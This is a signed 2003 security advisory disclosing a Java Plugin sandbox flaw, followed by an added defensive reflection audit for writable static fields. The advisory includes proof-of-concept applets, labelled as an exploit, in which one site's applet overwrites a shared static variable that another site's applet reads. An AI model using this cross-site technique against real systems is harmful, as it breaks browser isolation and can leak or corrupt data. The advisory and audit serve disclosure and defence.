-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Cross-Site Java breaks Sandbox Isolation for Unsigned Applets
=============================================================

Product  : Java Plugin
Version  : 1.4.2_01
OS       : Win32 (should apply for other OSs too)
URL      : http://java.sun.com
Found by : Marc Schoenefeld (marc@illegalaccess.org)
Date     : 10/21/03

PROBLEM DESCRIPTION : Cross-Site Java

Unsigned applets coming from different sites may share data areas via
undocumented static variables of the JDK. When these variables are
altered, JDK internal state may become corrupt and functionality is no
longer. This especially concerns XML processing, which depends on the
org.apache.xalan.processor.XSLProcessorVersion class. This behavior
violates the isolation restriction of the sandbox.

STEPS TO FOLLOW TO REPRODUCE THE PROBLEM :

Two applets,
 - one on siteA: www.siteA.org => Read.html / ReadApplet.class
 - one on siteB: www.siteB.org => Write.html / WriteApplet.class

The applet from siteB can read and write a variable that is also used
by siteA. Data protection is therefore not guaranteed: an unsigned
applet may grab data stored in this variable by a signed applet or
interfere with its XML processing, and therefore violates the isolation
restriction of the sandbox.

==========READAPPLET=========================
/* Illegalaccess.org java exploit */
/* coded by Marc Schoenefeld */
import java.awt.Graphics;

public class ReadApplet extends java.applet.Applet {
    // Print the shared static field on every repaint.
    public void paint(Graphics g) {
        System.out.println(org.apache.xalan.processor.XSLProcessorVersion.S_VERSION);
    }

    // Print it once when the applet class is loaded.
    static {
        System.out.println(org.apache.xalan.processor.XSLProcessorVersion.S_VERSION);
    }
}
==========READAPPLET=========================

==========WRITEAPPLET=========================
import java.awt.Graphics;

public class WriteApplet extends java.applet.Applet {
    // Append to the shared static field on every repaint.
    public void paint(Graphics g) {
        org.apache.xalan.processor.XSLProcessorVersion.S_VERSION += "a";
    }

    // Overwrite it once when the applet class is loaded.
    static {
        org.apache.xalan.processor.XSLProcessorVersion.S_VERSION = "altered from SiteA";
    }
}
==========WRITEAPPLET=========================

=========Write.html============================
<HTML>
<BODY BGCOLOR=#66FF66>
<PRE>
WriteApplet, write to variable
Marc (marc@org.illegalaccess)
</PRE>
<applet codebase=. code=WriteApplet.class width=100 height=100>
</applet>
</BODY>
</HTML>

========Read.html=============================
<HTML>
<BODY BGCOLOR=#6666FF>
<PRE>
ReadApplet, read from variable
Marc (marc@org.illegalaccess)
</PRE>
<applet codebase=. code=ReadApplet.class width=100 height=100>
</applet>
</BODY>
</HTML>

- --
Never be afraid to try something new. Remember, amateurs built the
ark; professionals built the Titanic. -- Anonymous

Marc Schönefeld Dipl. Wirtsch.-Inf.
/ Software Developer

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (AIX)
Comment: For info see http://www.gnupg.org

iD8DBQE/lFKWqCaQvrKNUNQRAtSgAJ4k2hORvU0sxMYejBdc03dEFmUT8wCePPWy
+gwoqNdNGQ9VGJv3gnfxoVY=
=HPdA
-----END PGP SIGNATURE-----
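
A defensive check for the condition this advisory describes, as an added example that is not part of the original message: a reflection audit that reports public static non-final fields of public classes, which any code able to see the class can overwrite. The class MutableStaticAudit and the nested SampleVersion are constructed for illustration; SampleVersion only mirrors the shape of the field named above.

```java
import java.lang.reflect.Field;
import java.lang.reflect.Modifier;
import java.util.ArrayList;
import java.util.List;

/** Added example: lists public static non-final fields, i.e. globally writable state. */
public class MutableStaticAudit {

    // Constructed stand-in with the same shape as the field named in the advisory.
    public static class SampleVersion {
        public static String S_VERSION = "1.0";        // writable by any caller: reported
        public static final String PRODUCT = "sample"; // final: cannot be reassigned
        private static int counter = 0;                // not reachable from other classes
    }

    /** Returns "Class.field : type" for every public static non-final field. */
    public static List<String> findMutableStatics(Class<?> cls) {
        List<String> hits = new ArrayList<>();
        // Fields of a non-public class are not directly reachable from other packages.
        if (!Modifier.isPublic(cls.getModifiers())) {
            return hits;
        }
        for (Field f : cls.getDeclaredFields()) {
            int m = f.getModifiers();
            if (Modifier.isPublic(m) && Modifier.isStatic(m) && !Modifier.isFinal(m)) {
                hits.add(cls.getName() + "." + f.getName() + " : " + f.getType().getName());
            }
        }
        return hits;
    }

    public static void main(String[] args) throws ClassNotFoundException {
        // With no arguments, audit the constructed sample; otherwise audit the named classes.
        if (args.length == 0) {
            findMutableStatics(SampleVersion.class).forEach(System.out::println);
            return;
        }
        ClassLoader loader = MutableStaticAudit.class.getClassLoader();
        for (String name : args) {
            // initialize=false: inspect the class without running its static initializer.
            Class<?> cls = Class.forName(name, false, loader);
            findMutableStatics(cls).forEach(System.out::println);
        }
    }
}
```

The audit only catches reassignable fields; a `public static final` array or collection still exposes mutable contents and needs a separate review.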